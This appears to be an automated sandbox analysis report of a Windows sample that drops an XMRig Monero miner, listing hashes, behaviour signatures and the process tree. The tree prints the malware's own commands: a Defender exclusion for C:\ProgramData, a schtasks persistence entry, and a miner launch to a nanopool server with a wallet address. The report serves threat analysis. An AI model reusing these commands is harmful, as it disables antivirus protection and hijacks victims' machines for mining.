Resubmissions

26-11-2022 08:19

221126-j7yhtaed66 10

25-11-2022 12:27

221125-pmxnnsbe8t 8

24-11-2022 09:51

221124-lvp21seh53 10

24-11-2022 09:44

221124-lqgvvahf3x 10

Analysis

  • max time kernel
    136s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-11-2022 09:44

General

  • Target

    file.exe

  • Size

    1.4MB

  • MD5

    073a3dc0c60492b618f888c5e603fd05

  • SHA1

    4de52c57f8f032724452e901120bcf0fbee52902

  • SHA256

    f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27

  • SHA512

    4262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f

  • SSDEEP

    24576:W+wHtwQBTvwpeNrT2i8k57TujjVx3KClNyOiY:W+sBTopej8Mw3NlNF

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4792
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE340.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:3504
      • C:\ProgramData\winrar\OWT.exe
        "C:\ProgramData\winrar\OWT.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3044
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3912
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1276
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
            5⤵
            • Creates scheduled task(s)
            PID:3672
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:3956

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\winrar\OWT.exe

    Filesize

    1.4MB

    MD5

    073a3dc0c60492b618f888c5e603fd05

    SHA1

    4de52c57f8f032724452e901120bcf0fbee52902

    SHA256

    f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27

    SHA512

    4262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f

  • C:\ProgramData\winrar\OWT.exe

    Filesize

    1.4MB

    MD5

    073a3dc0c60492b618f888c5e603fd05

    SHA1

    4de52c57f8f032724452e901120bcf0fbee52902

    SHA256

    f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27

    SHA512

    4262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    d28a889fd956d5cb3accfbaf1143eb6f

    SHA1

    157ba54b365341f8ff06707d996b3635da8446f7

    SHA256

    21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

    SHA512

    0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

  • C:\Users\Admin\AppData\Local\Temp\tmpE340.tmp.bat

    Filesize

    138B

    MD5

    241d3b0401da29531e54086e32a52107

    SHA1

    ae42f8baa3e8fe1bd0cd1448f0bf7a13b6e314ce

    SHA256

    0a2d8b3733b48c37dede0c67b78976d5d8783bcbd41cc87d737b80252ec26793

    SHA512

    0e4d6bf1c622424c393c7aa71754b47d7ea2acf2eef09df3de1d3b08615d6586f99d8730aa789ad460ed68247b8e81ed3cb0de70e82566f9ea1d02944250a96e

  • memory/1276-172-0x0000000000000000-mapping.dmp

  • memory/1444-146-0x0000000000000000-mapping.dmp

  • memory/2364-140-0x0000000001650000-0x0000000001691000-memory.dmp

    Filesize

    260KB

  • memory/2364-143-0x00007FFA68D70000-0x00007FFA68EBE000-memory.dmp

    Filesize

    1.3MB

  • memory/2364-137-0x00007FFA84600000-0x00007FFA847A1000-memory.dmp

    Filesize

    1.6MB

  • memory/2364-136-0x00007FFA68EC0000-0x00007FFA68F7D000-memory.dmp

    Filesize

    756KB

  • memory/2364-139-0x00007FFA67CB0000-0x00007FFA68771000-memory.dmp

    Filesize

    10.8MB

  • memory/2364-141-0x00007FFA86130000-0x00007FFA8615B000-memory.dmp

    Filesize

    172KB

  • memory/2364-142-0x0000000000150000-0x000000000031C000-memory.dmp

    Filesize

    1.8MB

  • memory/2364-138-0x0000000000150000-0x000000000031C000-memory.dmp

    Filesize

    1.8MB

  • memory/2364-144-0x00007FFA67CB0000-0x00007FFA68771000-memory.dmp

    Filesize

    10.8MB

  • memory/2364-148-0x0000000001650000-0x0000000001691000-memory.dmp

    Filesize

    260KB

  • memory/2364-147-0x0000000000150000-0x000000000031C000-memory.dmp

    Filesize

    1.8MB

  • memory/2364-149-0x00007FFA67CB0000-0x00007FFA68771000-memory.dmp

    Filesize

    10.8MB

  • memory/2364-134-0x00007FFA85FE0000-0x00007FFA8607E000-memory.dmp

    Filesize

    632KB

  • memory/2364-135-0x00007FFA81930000-0x00007FFA81942000-memory.dmp

    Filesize

    72KB

  • memory/2364-133-0x00007FFA68F80000-0x00007FFA6902A000-memory.dmp

    Filesize

    680KB

  • memory/3044-166-0x00007FFA86130000-0x00007FFA8615B000-memory.dmp

    Filesize

    172KB

  • memory/3044-180-0x00007FFA62BF0000-0x00007FFA62CF2000-memory.dmp

    Filesize

    1.0MB

  • memory/3044-160-0x00007FFA85FE0000-0x00007FFA8607E000-memory.dmp

    Filesize

    632KB

  • memory/3044-161-0x00007FFA81930000-0x00007FFA81942000-memory.dmp

    Filesize

    72KB

  • memory/3044-162-0x00007FFA68B60000-0x00007FFA68C1D000-memory.dmp

    Filesize

    756KB

  • memory/3044-163-0x00007FFA84600000-0x00007FFA847A1000-memory.dmp

    Filesize

    1.6MB

  • memory/3044-164-0x00007FFA67980000-0x00007FFA68441000-memory.dmp

    Filesize

    10.8MB

  • memory/3044-165-0x0000000000D30000-0x0000000000EFC000-memory.dmp

    Filesize

    1.8MB

  • memory/3044-155-0x0000000000000000-mapping.dmp

  • memory/3044-167-0x0000000003000000-0x0000000003041000-memory.dmp

    Filesize

    260KB

  • memory/3044-168-0x0000000000D30000-0x0000000000EFC000-memory.dmp

    Filesize

    1.8MB

  • memory/3044-169-0x00007FFA68A10000-0x00007FFA68B5E000-memory.dmp

    Filesize

    1.3MB

  • memory/3044-190-0x00007FFA67980000-0x00007FFA68441000-memory.dmp

    Filesize

    10.8MB

  • memory/3044-183-0x0000000000D30000-0x0000000000EFC000-memory.dmp

    Filesize

    1.8MB

  • memory/3044-182-0x00007FFA82DE0000-0x00007FFA82E1B000-memory.dmp

    Filesize

    236KB

  • memory/3044-181-0x00007FFA84E20000-0x00007FFA84E8B000-memory.dmp

    Filesize

    428KB

  • memory/3044-174-0x00007FFA67980000-0x00007FFA68441000-memory.dmp

    Filesize

    10.8MB

  • memory/3044-179-0x00007FFA689D0000-0x00007FFA68A05000-memory.dmp

    Filesize

    212KB

  • memory/3044-159-0x00007FFA68C20000-0x00007FFA68CCA000-memory.dmp

    Filesize

    680KB

  • memory/3044-178-0x00007FFA84310000-0x00007FFA84337000-memory.dmp

    Filesize

    156KB

  • memory/3504-153-0x0000000000000000-mapping.dmp

  • memory/3672-175-0x0000000000000000-mapping.dmp

  • memory/3912-170-0x0000000000000000-mapping.dmp

  • memory/3912-176-0x00007FFA67980000-0x00007FFA68441000-memory.dmp

    Filesize

    10.8MB

  • memory/3912-177-0x00007FFA67980000-0x00007FFA68441000-memory.dmp

    Filesize

    10.8MB

  • memory/3956-193-0x000001541D6A0000-0x000001541D6C0000-memory.dmp

    Filesize

    128KB

  • memory/3956-195-0x000001541D6A0000-0x000001541D6C0000-memory.dmp

    Filesize

    128KB

  • memory/3956-185-0x0000000140343234-mapping.dmp

  • memory/3956-186-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3956-187-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3956-188-0x000001541D5F0000-0x000001541D610000-memory.dmp

    Filesize

    128KB

  • memory/3956-189-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3956-184-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3956-191-0x000001541D640000-0x000001541D660000-memory.dmp

    Filesize

    128KB

  • memory/3956-192-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3956-196-0x000001541D660000-0x000001541D680000-memory.dmp

    Filesize

    128KB

  • memory/3956-194-0x000001541D660000-0x000001541D680000-memory.dmp

    Filesize

    128KB

  • memory/4792-150-0x00007FFA67CB0000-0x00007FFA68771000-memory.dmp

    Filesize

    10.8MB

  • memory/4792-145-0x0000000000000000-mapping.dmp

  • memory/4792-151-0x0000024ABFF40000-0x0000024ABFF62000-memory.dmp

    Filesize

    136KB

  • memory/4792-154-0x00007FFA67CB0000-0x00007FFA68771000-memory.dmp

    Filesize

    10.8MB